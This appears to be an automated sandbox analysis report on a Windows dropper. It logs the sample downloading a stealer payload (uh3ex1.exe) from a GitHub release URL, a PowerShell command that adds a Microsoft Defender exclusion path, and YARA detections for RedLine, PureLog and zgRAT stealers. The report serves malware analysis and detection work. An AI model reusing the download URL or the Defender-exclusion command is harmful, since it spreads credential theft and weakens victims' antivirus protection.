Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 12, 2024 14:50:24.429701090 CET | 1.1.1.1 | 192.168.2.9 | 0x422d | No error (0) | github.com |  | 140.82.121.4 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 14:50:26.370774031 CET | 1.1.1.1 | 192.168.2.9 | 0x70cb | No error (0) | objects.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 14:50:26.370774031 CET | 1.1.1.1 | 192.168.2.9 | 0x70cb | No error (0) | objects.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 14:50:26.370774031 CET | 1.1.1.1 | 192.168.2.9 | 0x70cb | No error (0) | objects.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Nov 12, 2024 14:50:26.370774031 CET | 1.1.1.1 | 192.168.2.9 | 0x70cb | No error (0) | objects.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                              • github.com
                                                                                                                                                                                                                                              • objects.githubusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49707 | 140.82.121.4 | 443 | 7620 | C:\Users\user\Desktop\9LrEuTWP8s.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 13:50:25 UTC | 119 | OUT | GET /Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: github.com
                                                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-12 13:50:26 UTC | 957 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                              Server: GitHub.com
                                                                                                                                                                                                                                              Date: Tue, 12 Nov 2024 13:50:26 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/882783246/b23a0dba-ce39-4346-b67f-261d78699733?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241112%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241112T135026Z&X-Amz-Expires=300&X-Amz-Signature=2c2918ad1c088c74e424c5e0842a55433a7fe7a314dfeedb12184bfb225b99f5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Duh3ex1.exe&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
2024-11-12 13:50:26 UTC | 3380 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49708 | 185.199.111.133 | 443 | 7620 | C:\Users\user\Desktop\9LrEuTWP8s.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 13:50:26 UTC | 548 | OUT | GET /github-production-release-asset-2e65be/882783246/b23a0dba-ce39-4346-b67f-261d78699733?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241112%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241112T135026Z&X-Amz-Expires=300&X-Amz-Signature=2c2918ad1c088c74e424c5e0842a55433a7fe7a314dfeedb12184bfb225b99f5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Duh3ex1.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                                                                                                                              Host: objects.githubusercontent.com
                                                                                                                                                                                                                                              Connection: Keep-Alive
2024-11-12 13:50:27 UTC | 842 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Length: 271360
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Last-Modified: Mon, 04 Nov 2024 20:48:23 GMT
                                                                                                                                                                                                                                              ETag: "0x8DCFD1205FE7893"
                                                                                                                                                                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                              x-ms-request-id: d2615bf2-b01e-002f-12fb-2eec9e000000
                                                                                                                                                                                                                                              x-ms-version: 2024-08-04
                                                                                                                                                                                                                                              x-ms-creation-time: Mon, 04 Nov 2024 20:48:23 GMT
                                                                                                                                                                                                                                              x-ms-blob-content-md5: UMpJY0QgM2lYznNinZos9g==
                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                              x-ms-lease-state: available
                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=uh3ex1.exe
                                                                                                                                                                                                                                              x-ms-server-encrypted: true
                                                                                                                                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                              Fastly-Restarts: 1
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Age: 331
                                                                                                                                                                                                                                              Date: Tue, 12 Nov 2024 13:50:27 GMT
                                                                                                                                                                                                                                              X-Served-By: cache-iad-kiad7000059-IAD, cache-dfw-kdal2120032-DFW
                                                                                                                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                                                                                                                              X-Cache-Hits: 4, 0
                                                                                                                                                                                                                                              X-Timer: S1731419427.054764,VS0,VE38
2024-11-12 13:50:27 UTC | 1378 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL#g6 @@ @



Target ID: 1
Start time: 08:50:17
Start date: 12/11/2024
Path: C:\Users\user\Desktop\9LrEuTWP8s.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\9LrEuTWP8s.exe"
Imagebase: 0xf70000
File size: 9'728 bytes
MD5 hash: BA7D3BDA1009E3900C1ECA3D56AA8B4F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:08:50:17
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:08:50:17
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'
                                                                                                                                                                                                                                              Imagebase:0x40000
                                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:08:50:18
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:08:50:20
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                              Imagebase:0x7ff72d8c0000
                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                              Start time:08:50:28
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Path1\To2\Save444\uh3ex1.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Path1\To2\Save444\uh3ex1.exe"
                                                                                                                                                                                                                                              Imagebase:0x710000
                                                                                                                                                                                                                                              File size:271'360 bytes
                                                                                                                                                                                                                                              MD5 hash:50CA49634420336958CE73629D9A2CF6
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                              Start time:08:50:28
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                              Start time:08:50:29
                                                                                                                                                                                                                                              Start date:12/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                              Imagebase:0xa70000
                                                                                                                                                                                                                                              File size:262'432 bytes
                                                                                                                                                                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1646379749.0000000000F02000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1531659855.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_3280000_9LrEuTWP8s.jbxd

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:6.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                execution_graph 21940 8747160 21941 87471a3 SetThreadToken 21940->21941 21942 87471d1 21941->21942

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 516 46bb470-46bb4a9 518 46bb4ab 516->518 519 46bb4ae-46bb7e9 call 46bacbc 516->519 518->519 580 46bb7ee-46bb7f5 519->580
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 665 46bb490-46bb4a9 666 46bb4ab 665->666 667 46bb4ae-46bb7e9 call 46bacbc 665->667 666->667 728 46bb7ee-46bb7f5 667->728

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 0 874715a-874719b 2 87471a3-87471cf SetThreadToken 0->2 3 87471d1-87471d7 2->3 4 87471d8-87471f5 2->4 3->4
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetThreadToken.KERNELBASE(?), ref: 087471C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1479916663.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8740000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3254676861-0
                                                                                                                                                                                                                                                • Opcode ID: 89a07165929f5020e00bfd317362702fa35fd2e3c2e041d374d079701ab3076a
                                                                                                                                                                                                                                                • Instruction ID: 0cd07bb771d84df41cacf3715ce33d76cb470e492d4ffaeb80380b5aea8b11eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89a07165929f5020e00bfd317362702fa35fd2e3c2e041d374d079701ab3076a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B21128719003488FDB10CF9AC884BDEFBF4EF48224F24846AD419A7350C775A945CFA5

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetThreadToken.KERNELBASE(?), ref: 087471C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1479916663.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_8740000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ThreadToken
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3254676861-0
                                                                                                                                                                                                                                                • Opcode ID: 2810ac7a18e6a4a44e842fe7b28b6f731cf9e65528c1115cc62bb9b784f7dcd6
                                                                                                                                                                                                                                                • Instruction ID: a48340606cc6b2158927599ecbccfbe0997d1143b1febba57bf47fe24bd4e786
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2810ac7a18e6a4a44e842fe7b28b6f731cf9e65528c1115cc62bb9b784f7dcd6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F01106B59003488FDB10DF9AC884BDEFBF8EB88224F14846AD419A7750C775A944CFA5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1478129165.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_75d0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dd46b05beef6afc6753239bf763c66977c8ec01b3668d8352087e0b4280697a1
                                                                                                                                                                                                                                                • Instruction ID: 1695fbfd2bf29d196ed5470eefc391bd397bb27e66ec5b3dfb6125da1ebe21c6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd46b05beef6afc6753239bf763c66977c8ec01b3668d8352087e0b4280697a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2532E8B1B043469FEB358BAC98447EABBE1BF86211F1484ABD405CF251DB35DC45CBA2

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1478129165.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_75d0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c9420afe620d85a4ff9d424eb9d5c77af2f115622562cdafda3e0658fbbc77a4
                                                                                                                                                                                                                                                • Instruction ID: 47d95e67a63e58ce20d0a277a146424e255c919ad70cb30f493966292c41d526
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9420afe620d85a4ff9d424eb9d5c77af2f115622562cdafda3e0658fbbc77a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 281227B1B04356DFDB259B6C98107EABBA2BF96211F14807BD905CF291DB35CC42C7A2

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6714ea69db3c834ec5b0357e43603baa03bb00ed0f9775315a820d91c0a0fb9a
                                                                                                                                                                                                                                                • Instruction ID: 0e09878dfb0b421c730feaf1078df399197cd952d4a9e654fc6920d44a6fda44
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6714ea69db3c834ec5b0357e43603baa03bb00ed0f9775315a820d91c0a0fb9a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB916D34B102148FDB14DF68D5946EEBBF6AF88710B158069D842EB355EF35EC82CB91

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1478129165.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_75d0000_powershell.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 487c56b70328d00ea1cd0235d4743ca256f4d9432e5f8dc13c0e665d3d224b1d
                                                                                                                                                                                                                                                • Instruction ID: d8826b25a680d3cc5fd5afb39356f84be7ba15f1d38e509e6e3a0ae93d0bd1fb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 487c56b70328d00ea1cd0235d4743ca256f4d9432e5f8dc13c0e665d3d224b1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A4136B4A00609DFDB06CF48C4A8AAAF7B1FF48310B118599D955AB364D732FC91CBA4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 628183176d7080d4676d6f5a75933b10bfaf67feb49f30e293bea40bdc3bbbdb
                                                                                                                                                                                                                                                • Instruction ID: 3c300d23c5a0a9b64523fc7f2f9f807d3aef47ee6ccb93534a0a9c245666d3b8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 628183176d7080d4676d6f5a75933b10bfaf67feb49f30e293bea40bdc3bbbdb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23419830A012499FCB11CF78D894ADEBBF2FF49210F148169D446EB392EB35AC09CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 30acc90664eac7b1bbba2888c0d808a6f9d6c7c022451b8a083c905e81583fa4
                                                                                                                                                                                                                                                • Instruction ID: 4d4ac318177c5c9795cac3cbd9487957e14937df05538d52b75baab47b520b18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30acc90664eac7b1bbba2888c0d808a6f9d6c7c022451b8a083c905e81583fa4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4319C313013019FD705EB68D840BDAB792EFC4625F048629E54ACB3A1EB71A9458BE5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d08a4947264d401e6a22dd9d3a6de9d22996aa6cae338db5d5b4376ccf0330b4
                                                                                                                                                                                                                                                • Instruction ID: de7a4a5de2d6100629953a76252b678847b47a2c7c8bbcf478249d21e3943ef3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d08a4947264d401e6a22dd9d3a6de9d22996aa6cae338db5d5b4376ccf0330b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D314A70A012099BDB05DFA9D494BEEBBF6AF88314F14806DE446EB350EB749C818B95
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8059b59635e9ca69a233f1275a769f9570d8ad4ba5dcb0a8e14422008c033a2b
                                                                                                                                                                                                                                                • Instruction ID: 1364bd17058f04da7809a6ff417e120bf1fe2040499e16d62bddf8fe286791c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8059b59635e9ca69a233f1275a769f9570d8ad4ba5dcb0a8e14422008c033a2b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C31B474A002499FEB01DFA4D454AAE7BB2EF84301F1084ACC641AB3A5CA78AD41DF60
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.1473331998.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
